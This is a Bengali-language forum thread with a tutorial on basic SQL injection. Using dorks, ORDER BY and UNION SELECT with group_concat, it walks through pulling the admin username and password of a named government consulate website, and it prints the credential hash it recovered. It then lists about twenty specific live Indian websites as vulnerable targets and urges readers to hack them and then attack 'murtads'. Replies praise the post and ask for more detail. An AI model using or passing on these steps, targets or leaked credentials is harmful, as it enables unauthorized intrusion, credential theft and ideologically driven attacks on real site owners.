Announcement

Collapse
No announcement yet.

Basic Sql Injection

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Basic Sql Injection

    BASIC SQL INJECTION



    আজ আমি আপনাদের শিখাব কিভাবে sql injectioner মাধ্যমে একটি সাইটের
    "admin username & password" বের করা যায়।

    প্রথমে dorc থেকে google এর মাধ্যমে vulnerable website খুজে বের করতে হবে।
    আপনি যদি কোন নির্দিষ্ট দেশের website খুইতে চান,তাহলে আপনাকে dorc এর শেষে আপনাকে সেই দেশের websiter extension যোগ করে দিতে হবে।

    মনে করেন,আমি ভারতের website খুজতে চাই,তাহলে dorc টি এইরকমঃ
    inurl:news.php?id =site:.in

    এই সাইট আগেই হ্যাক হয়ে গেছেঃ
    আমাদের টার্গেট সাইট হলঃ


    আমি দেখব এই সাইটটি vulnerable কিনা?

    এর জন্য সাইটটির url শেষে (ULTA KOMA) চিহ্ন দিয়ে দেখব কোন erroe messege আসে কিনা?

    http://www.pakconsulatejeddah.gov.pk...how&item_id=53'

    that site is vulnerable !!

    এখন কাজ হল সাইটের databaser column সংখ্যা খুজে বের করা।

    এর জন্য "+order+by+" কমান্ড ব্যবহার করব।

    so, the database column number is=13
    এ খন বের করতে হবে এই টি column থেকে কোন কোন column vulnerable
    এর জন্য "union+select+" কমান্ড ব্যবহার করব।
    so,2nd & 5th columns are vulnerable!!
    যেই column গুলো vulnerable,সেই column গুলো ব্যবহার করে প্রয়োজনীয় তথ্য বেড় কোড়ে আনব।
    এখন database এর table name গুলো ব্যবহার করব।
    "group_concat(table_name) "
    "+from+information_schema.tables+where+table_schem a=database()
    এই কমান্ড দুটো ;
    তাহলে url টি দাড়ায়



    THE TABLES ARE:
    //Admin//
    ,blocks,gallary,gallary_images,news,pages,report_f iles,reports,slideshow,url_alias,users,videos,wp_c ommentmeta,wp_comments,
    wp_links,wp_options,wp_postmeta,wp_posts,wp_term_r elationships,wp_term_taxonomy,wp_terms,wp_usermeta ,wp_users

    এখন কাজ হল এই table গুলো থেকে admin table খুজে বের করা।
    দেখেই বুঝা যাচ্ছে "admin" এটিই হল admin table যেখানে খুজে পাব "admin table & password।
    এখন কাজ হল admin table টির column গুলো বের করা।
    এর জন্য ব্যবহার করব;
    "group_concat(column_name)"
    "+from+information_schema.columns+where+table_name =--"
    এখন কাঙ্ক্ষিত table টির CHAR code বের করে আনব HACK bar এর সাহায্যে।
    এখন keyboard থেকে f9 press করলে পেয়ে যাবেন HACK bar যদি আপনি HACKbar addon install করে থাকেন।

    এখন পেয়ে গেলাম table টির CHAR code

    CHAR code(97,100,109,105,110)

    url টি হলঃ


    admin table টির column গুলো পেয়ে গেলাম
    column গুলো হলঃ
    id,full_name,username,password,email,user_id,full_ name,email,password

    এখান থেকে username & password বের করব

    এর জন্য ব্যবহার করবঃ

    "group_concat(username,0x3a,password)"
    "+from+admin_table_name"
    কমান্ড ব্যবহার করে।

    এখন url টি হল:




    আমাদের টার্গেট সাইটটির username & password পেয়ে গেলাম


    usernameakadmincon
    password:1c6770d0e097b9a1dc3b76767991ba85


    ওহে ভাইয়েরা,এই সাইটগুলো হল ভারনাবল,তাই শুরু করুন হ্যাকিং উপরের পদ্দতিতে।একটা কথা মনে রাখবেন,এই অ্যাড্রেস গুলো দেয়ার এক্তাই কারন আপনারা যেন Basic Sql Injection শিখতে পারেন। তারপর মুরতাদদের আইডিগুলোতে আক্রমণ চালাবেন।


    http://www.sanklecha.in/photo-gallery.php?id=4'
    http://www.oucip.in/gallery.php?id=23'
    http://www.mji.co.in/gallery.php?pic=5'
    http://www.mitrc.ac.in/gallery.php?id=3'
    http://www.dakshindare.co.in/gallery.php?id=2'
    http://www.sanklecha.in/photo-gallery.php?id=4'
    http://www.oucip.in/gallery.php?id=23'
    http://karavalicollege.ac.in/gallery...ngalore-videos'
    http://www.mji.co.in/gallery.php?pic=5'
    http://www.mitrc.ac.in/gallery.php?id=3'
    http://www.oucip.in/gallery.php?id=23'
    http://www.sanklecha.in/photo-gallery.php?id=4'
    http://www.mitrc.ac.in/gallery.php?id=3'
    http://www.dakshindare.co.in/gallery.php?id=2'
    http://www.mji.co.in/gallery.php?pic=5'
    http://www.brilliantstudent.in/games.php?id=4'
    https://www.irma.ac.in/article.php?menuid=251'
    http://www.brilliantstudent.in/games.php?id=2'

    http://maids.ac.in/download.php?id=160'
    http://maids.ac.in/download.php?id=182'
    Last edited by salahuddin; 04-27-2016, 02:54 PM.

  • #2
    জাজাকাল্লাহ....... আরও চাই….ডিটেইলস লিখুন

    Comment


    • #3
      মাশা আল্লাহ।
      মুহতারাম ভাই!
      একটু বিস্তৃত আকারে লিখুন, যাতে আমরাও হ্যাকিং এ দক্ষ হয়ে উঠতে পারি।

      Comment


      • #4
        জাযাকাল্লাহ ভাই।

        Comment


        • #5
          ভাই যে মানতেক (গ্রীক বিদ্যা) ছাড়ালেন তা তো কিছুই বুঝছি না। আরো বিস্তারিত বলেন।
          মুমিনদেরকে সাহায্য করা আমার দায়িত্ব
          রোম- ৪৭

          Comment


          • #6
            jajakallah------------------
            Last edited by tipo soltan; 04-20-2016, 07:20 AM.
            ইয়া রাহমান ! বিশ্বের নির্য়াতিত মুসলিমদেরকে সাহায্য করুন। তাগুতদেরকে পরাজিত করুন। আমিন।

            Comment


            • #7
              ভাই আপনাদের দুইজনের reply এর কিছুই বুঝলাম না।হাসবেন কেন??

              Comment


              • #8
                সম্মানিত ভাই ! আপনি যেই পোস্ট দিয়েছেন এর জন্য আল্লাহ তাআলা আপনাকে উত্তম প্রতিদান দান করুন। এটি অত্যন্ত গুরুত্বপূর্ণ পোস্ট। আমরা যারা সাধারণ তারা যাতে বুঝতে পারি তাই পোস্টটা আরেকটু বিস্তারিত ভাবে লিখে দেয়ার জন্য অনুরুধ রইলাম।
                ক্ষমা করবেন –আপনার পোস্টের কারণে হাসিনি।
                এটি অত্যন্ত মূল্যবান পোস্ট ।বুঝাই যাচ্ছে আপনি কস্ট করে এটি লিখেছেন।
                আবারও অনুরুধ রইল- পোস্টটা আরেকটু বিস্তারিত ভাবে লিখে দেয়ার জন্য
                ইয়া রাহমান ! বিশ্বের নির্য়াতিত মুসলিমদেরকে সাহায্য করুন। তাগুতদেরকে পরাজিত করুন। আমিন।

                Comment


                • #9
                  যাযাকাল্লাহ ভাই...@সালাহ...
                  আপনার পোষ্ট পড়ে আমি এক্কেবারে...ফিদা...��...হয়ে গেছি...!!
                  বলার ভাষা নাই...¿¿¿

                  “নিশ্চয়ই আল্লাহ মানুষের অন্তর সমূহের খবর জানেন"

                  Comment


                  • #10
                    জাযাকাল্লাহ ভাই।

                    Comment

                    Working...
                    X